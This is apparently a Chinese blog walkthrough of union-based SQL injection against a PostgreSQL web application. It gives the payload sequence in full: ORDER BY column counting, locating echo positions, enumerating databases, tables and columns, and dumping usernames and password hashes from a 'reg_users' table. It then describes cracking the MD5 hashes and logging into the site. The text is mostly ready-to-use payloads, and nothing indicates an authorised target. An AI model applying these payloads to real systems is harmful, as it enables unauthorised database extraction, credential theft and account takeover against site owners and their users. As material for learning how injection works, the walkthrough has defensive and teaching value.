判断注入点
and 1=2
判断回显点
order 不用 4 页面正常
order by 5 页面异常,得出只存在四个字段
测试回显位置
and 1=2 union select 'null',null,null,null
and 1=2 union select null,'null',null,null
and 1=2 union select null,null,'null',null
and 1=2 union select null,null,null,'null'
看到当null在第二位和第三位有回显
得到回显位置了,那么我们就可以根据回显点查询其他信息了
查库名
如下这条语句查出四条库名
and 1=2 union select null,null,string_agg(datname,','),null from pg_database
查表名
and 1=2 union select null,null,string_agg(tablename,','),null from pg_tables where schemaname='public'
查字段
这里我们先查user表的字段
and 1=2 union select null,null,string_agg(column_name,','),null from information_schema.columns where table_name='reg_users'
查出表中字段的所有数据
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
md5解密
得到账号密码,用md5解密
这里第一个账户显示已禁用我们继续解密下一条密码
好了这里我们就登录进去了
995
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
